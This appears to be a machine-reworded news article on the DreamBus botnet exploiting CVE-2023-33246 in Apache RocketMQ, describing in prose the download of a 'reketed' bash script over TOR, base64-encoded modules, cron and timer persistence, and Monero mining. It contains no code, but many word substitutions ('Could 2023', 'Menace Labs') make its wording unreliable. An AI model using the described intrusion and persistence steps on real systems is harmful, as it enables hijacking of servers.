DreamBus Botnet Exploiting RCE Flaw in Apache RocketMQ Servers
A vulnerability affecting Apache RocketMQ servers became once publicly disclosed in Could 2023, allowing remote code execution thru a gateway. RocketMQ is a cloud-native platform for messaging and streaming.
The inform execution vulnerability has been reported in RocketMQ affecting version 5.1.0 and beneath.
A remote, unauthenticated person can exploit this vulnerability by utilizing the replace configuration characteristic to create commands with the identical gain admission to stage as that of the RocketMQ person path of. It has been assigned CVE-2023-33246.
Juniper Menace Labs shed gentle on these attacks, detecting a sample the put threat actors capitalized on the vulnerability to infiltrate programs.
Remarkably, these infiltrations culminated in installing the notorious DreamBus bot, a malware force that re-emerged after lying dormant since 2021.
Mapping the Assault Timeline
Origin in early June, cybercriminals launched attacks against the RocketMQ vulnerability, with the assault’s intensity peaking in mid-June.
By utilizing ‘interactsh,’ Juniper Menace labs gathered actually handy reconnaissance files whereas conserving their actions covert.
On June nineteenth, a series of attacks emerged, that consists of the gain and execution of a malicious bash script named “reketed.”
On the identical day, threat actors exhibited two solutions for retrieving and executing this shell script.
In a single scenario, a TOR proxy carrier named “tor2web.in” facilitated anonymous downloading.
In the opposite, the attackers invoked a insist IP take care of
DreamBus’s Expanded Arsenal
The downloaded payload, the “reketed” bash script, accomplished with a insist hash (1d0c3e35324273ffeb434f929f834b59dcc6cdd24e9204abd32cc0abefd9f047).
Intriguingly, this file lacked VirusTotal (VT) detections at the time of diagnosis.
The “reketed” script orchestrated the gain of the DreamBus predominant module from a TOR hidden carrier.
(DreamBus botnet is a malware that delivers a cryptocurrency miner to infected computers).
The DreamBus predominant module, an ELF binary, surfaced after a a hit gain.
It posed challenges with its modified UPX headers, foiling the ragged UPX unpacking path of.
Upon deciphering, the module became once published to create diversified base64 encoded strings, every corresponding to obvious functionalities.
Decoding the base64 strings unveiled a bash script identical to “reketed,” endowed with various capabilities.
These scripts orchestrated diversified functions, from downloading modules to mining Monero cryptocurrency.
They navigated the advanced TOR community, forging paths appreciate “/ping,” “/mine,” and “/cmd1.”
The Web of Persistence and Monero Mining
To make certain sustained presence, the DreamBus malware employed a multi-pronged arrangement.
Timer products and companies, cron jobs, and automatic IT tools fueled its persistence, allowing cybercriminals to have their foothold.
Additionally, the malware introduced Monero cryptocurrency mining, XMRig, thru TOR, perpetuating their inappropriate dreams.
The symbiotic relationship between the RocketMQ vulnerability and the DreamBus bot underscores the inherent dangers of unpatched programs.
Source credit : cybersecuritynews.com